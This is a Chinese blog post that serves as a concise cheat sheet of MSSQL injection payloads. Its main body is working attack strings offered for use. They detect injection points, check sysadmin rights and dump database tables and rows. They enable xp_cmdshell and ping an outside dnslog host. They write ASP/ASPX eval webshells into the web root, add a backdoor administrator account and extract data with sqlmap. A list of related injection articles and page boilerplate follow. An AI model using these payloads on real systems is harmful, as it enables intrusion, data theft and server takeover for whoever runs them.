MSSQL注入流程,简洁

已于 2023-06-29 21:31:07 修改
阅读量731 收藏 3
点赞数
分类专栏: MSSQL注入 文章标签: sqlserver oracle 数据库
于 2021-02-28 16:00:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chest_/article/details/114227194
版权

MSSQL注入日常使用的payload,遇到MSSQL注入,这些够用了,完整的在这里
传送门

拿数据的
##判断注入点
and user>0 --
having 1=1--	

##判断权限,如果页面回显正常则为正确,否则报错
and 1=(select IS_SRVROLEMEMBER('sysadmin')) --

##获取当前数据库
And 1=(select db_name()) --

##获取当前数据库内的所有数据表
and 1=convert(int,(select quotename(name) from 数据库..sysobjects where xtype='U' FOR XML PATH(''))) --

##获取当前数据库内的指定数据表的所有字段
and 1=(select quotename(name) from 数据库名..syscolumns where id =(select id from 数据库名..sysobjects where name='指定表名') FOR XML PATH(''))-- 

##取指定数据库内的表数据内容
and 1=(select top 1 * from 指定数据库..指定表名 where排除条件 FOR XML PATH(''))--



命令执行
##开启xp_cmdshell,0为关闭,1为开启
;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; --

##关闭xp_cmdshell
;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE; --

##执行ping判断否能执行xm_cmdshell和服务器是否通外网,注意:需要开启多语句才能执行xm_cmdshell
;exec master..xp_cmdshell "ping teki6x.dnslog.cn" -- 

##写入一句话木马(asp),需要知道网站根目录
;exec master..xp_cmdshell 'echo ^<%25eval request(1234)%25^> >  C:\Inetpub\wwwroot\test.asp' --

##写入一句话木马(aspx),需要知道网站根目录
;exec master..xp_cmdshell 'echo ^<%25@ Page Language="Jscript"%25^>^<%25eval(Request.Item["aaa"],"unsafe");%25^> >  C:\Inetpub\wwwroot\test.aspx' --

##用XP_CMDSHELL添加用户test1
;exec master.dbo.xp_cmdshell 'net user test1 test1 /add' --

##XP_CMDSHELL把用户test1加到ADMIN组,添加管理员组才可远程
;exec master.dbo.xp_cmdshell 'net localgroup administrators test1 /add' -- 



无回显/网站根目录获取
##在数据库tempdb下创建临时表temp_db,字段test
;use tempdb;create table temp_db (test varchar(1000)); --

##查找网站文件并把结果写入到temp_db表中
;use tempdb;insert into temp_db(test) exec master..xp_cmdshell 'dir /s /b C:\search.asp';--

##用sqlmap得到表temp_db的内容:
python2 sqlmap.py -r 1.txt --dbms="Microsoft SQL Server" --technique=E  -D "tempdb" -T "temp_db" -C "test" --dump --fresh-queries															--fresh-queries参数为刷新缓存

##手工读取temp_db表内容
and 1=(select top 1 * from tempdb..temp_db where test=1 FOR XML PATH(''))--

##建议用like匹配更好,注意吧"%" "''"编码,%编码是%25,单引号是%27
and 1=(select top 1 * from tempdb..temp1_db where test1 like %27%25asp%27  FOR XML PATH('')) --
春日野穹ㅤ
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MSSQL注入的详细入门讲解
寒虚子
12-05 49
因此,这个查询实际上就变成了SELECT * FROM users WHERE username = ‘admin’,如果存在用户名为admin的用户,那么查询就会返回该用户的所有信息,从而绕过了密码验证。MSSQL注入是一种常见的网络攻击技巧,通过输入恶意的SQL语句到应用程序的查询中,攻击者可以从数据库中读取敏感信息,甚至可以修改或删除数据。任何使用MSSQL作为后端数据库的应用程序,如果没有正确的防护措施,都可能成为MSSQL注入的目标。今天,我们将深入探讨MSSQL注入的基本原理和实践方法。
SQL注入漏洞(MSSQL注入
errorr0
07-05 2395
MSSQL注入的入门讲解
SQL Server手工注入方式
good good study
01-04 5680
本文详细的介绍了Sql Server安全基础,包括环境搭建,T-sql语法,sqlserver用户权限,以及sqlserver注入的方法和提权方式。 Microsoft SQL Server(微软结构化查询语言服务器),也叫Mssql,是由美国微软公司所推出的关系型数据库。默认端口号为1433常见版本如下版本年份发布名称8.02000年8.02003年SQL Server 2000 64-bit版本9.02005年10.02008年10.252009年SQL Azure。
Web安全基础学习:SQL注入漏洞之Mssql注入
最新发布
qq_51862722的博客
06-18 884
SQL注入(SQL Injection)是一种常见的Web安全漏洞,形成的主要原因是web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。
MSSQL注入
秋水的博客
09-04 8956
MSSQL数据库 数据库简介 MSSQL是指微软的SQLServer数据库服务器,它是一个数据库平台,提供数据库的从服务器到终端的完整的解决方案,其中数据库服务器部分,是一个数据库管理系统,用于建立、使用和维护数据库。属关系型数据库 注入简介 MSSQL注入攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大,存储过程以及函数语句十分丰富,这些灵活的语句造就了新颖的攻击思路 ...
mssql注入
砌墙的保安
10-12 367
文章目录SQL Server简介用户权限默认数据库MSSQL注入的危害查询基础数据库的连接查询数据库查询数据表查询列查询数据联合查询(基础)查询进阶报错注入堆叠注入反弹注入(外联注入)SA权限开启xp_cmdshell获取主机权限提权开启3389 SQL Server 简介 又称MSSQL SQL Server数据库是由Microsoft开发和推广的关系数据库管理系统(DBMS),是一个比较大型的数据库。端口号为1433。数据库后缀名 .mdf,注释符是 – 用户权限 sa权限:数据库操作,文件管理,命令执
记一次mssql手工注入
Matthew
04-04 9307
记一次mssql手工注入 记录一次mssql注入的过程,很多都是久的知识,大家当温故而知新吧。 xxxx/xxx?nIDX=122‘ 注入报错,直接sqlmap跑,但有waf拦截; 只能进行fuzz了,发现select 和 from之间用/**/就可以绕过。 (1)首先查看版本号: 由于是数字型的报错,不用闭合单引号。直接@@version先查看版本号: Microsoft OLE ...
Sql server注入分类之语句总结
qq_42990434的博客
12-16 3109
关于mssql的注入语句,跟mysql也差不了多少,都是从information_scheam库中获取各种数据 基础语句 select ***://查询指令 @@version // 数据库版本 system_user //系统用户 suser_sname() //查出当前操作数据库的登入名,一般和触发器一起用来监控是谁对表做了操作 user //获取当前数据库用户名 db_name() // 当前数据库名 其中db_name(N)可以来遍历其他数据库
SQL注入中利用XP_cmdshell提权的用法
得峰的专栏 [网络收藏]
05-15 2586
先来介绍一下子服务器的基本情况,windows 2000 adv server 中文版,据称打过了sp3,asp+iis+mssql 。首先扫描了一下子端口,呵呵,开始的一般步骤。端口21开放: FTP (Control)端口80开放: HTTP, World Wide Web端口135开放: Location Service端口139开放: NETBIOS Session Service端口14
SQL 入门到入魔(SQL注入原因和流程
MachineGunJoe666
06-28 639
目录 ​SQL注入 什么是SQL注入 SQL的类型 Structured Query Language IPv4地址 端口 域名(domain name) DNS (Domain Name System) DNS解析流程 端口和文件 项目架构 SQL注入的发生 如何获取数据库信息 MySQL系统库(5.7) POST请求 GET请求 参数会如何处理? 怎么传入SQL? SQL注入的完整流程 其他知识 SQL注入 什么是SQL注入 SQL注入即是指...
(转-收集)MSSQL手工注入语句集合
weixin_30553837的博客
04-16 254
andexists(select*fromsysobjects)//判断是否是MSSQL andexists(select*fromtableName)//判断某表是否存在..tableName为表名 and1=(select@@VERSION)//MSSQL版本 And1=(selectdb_name())//当前数据库名 and1=(select@...
SQL注入——mssql注入
01-19
1、Mssql权限问题 Mssql角色: 服务器角色–针对运行整个数据库服务器设定的角色和权限。 数据库角色–针对某个特定数据库设定的角色和权限。 固定服务器角色    sysadmin             可以在 SQL Server 中执行任何活动。 serveradmin  可以设置服务器范围的配置选项,关闭服务器。 setupadmin 可以管理链接服务器和启动过程,并执行某些系统存储过程(sp_serveroption)。
SQL注入基本步骤
mutou990的博客
08-03 2560
SQL注入基本步骤 1、注入点测试 2、查询字段数 3、判断回显位 4、查询数据库的基本信息 5、爆数据库名 6、爆数据库表名 7、爆字段名 现在来介绍几个在渗透测试中常用的几个函数和表库名。 数据库名:database() 数据库版本: version() 数据库用户: user() 操作系统: @@version_compile_os 系统用户名: system_user() 当前用户名: current_user 连接数据库的用户名:session_user() 读取数据库路径:@@datadir M
SQL注入这个坑
阴山隐修者
01-09 1936
SQL注入是一个老话题,没想到今天有同事在android framework踩到了这个坑,mark下。 业务需求要修改查询mmssms.db的一张表canonical_addresses,看到代码有点懵圈,类似如下: ContentResolver cr = this.getContentResolver(); Curso
血腥!实况转播SQL注入全过程,让你知道危害有多大。
weixin_30532973的博客
03-31 948
前阵子发现公司的网站有SQL注入漏洞,向项目经理提了以后,得到的答复异常的冷淡:“早就知道,这种asp的网站肯定有漏洞,要是Asp.net的网站就没问题”,先暂不评价此说法对错,如此冷淡的反应只能说明了对SQL注入的无知,今天就实况转播,来告诉大家SQL注入究竟有多大的危害。 初步注入--绕过验证,直接登录 公司网站登陆框如下: 可以看到除了账号密码之外,还有一个公司名的输入框,根...
SQL注入(四)手工注入攻击步骤
热门推荐
pumpkin9
05-05 4万+
以bugkuctf平台的一道题为例:链接http://120.24.86.145:8002/chengjidan/ 0)首先测试正常数据。 链接的结尾添加【?id=1(数字任意)】 1) 判断是否存在注入点; 【?id=32(数字任意)】链接的结尾依次添加语句【‘】、【and 1=1】和【and 1=2】,来判断网站是否存在注入点。尝试在正常数据后加上单引号,发现数据为空,加...
MSSQL数据库注入
zhuangsle的博客
08-26 1050
MSSQL数据库注入实践 一、MSSQL注入的基础知识 (一)注入点的检测 1、数据库类型判断 概述 MSSQL数据库中,存在一个系统表sysobjects,可以通过判断这个表是否存在来判断该数据库是否为MSSQL数据库 SQL语句执行 select * from admin where id=1 and exists(select * from sysobjects); # 正常返回结果,则表示存在该数据库表 select * from admin where id=1 and exists(se
MSSQL反弹注入靶场
weixin_45540609的博客
04-21 546
方法1——报错注入 查找sql注入点 2'order by 4 -- asd,知道字段数有3个,且有一个数据表叫news 2' union all select 1,'aaa','bbb' from news -- asd 联合查询注入发现第2,3个字段是字符类型 2' union all select id,name,null from sysobjects where xtype='U' -- asd 2' union all select id,name...
SQL注入(Access、Mssql)
jxy158212的博客
01-03 1198
之前的文章,已经详细介绍了sql注入的原理,和常见sql注入方式,并以MySql数据库进行了简单的示例。接下来,我们将以Access和Mssql数据库为例进行讲解。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值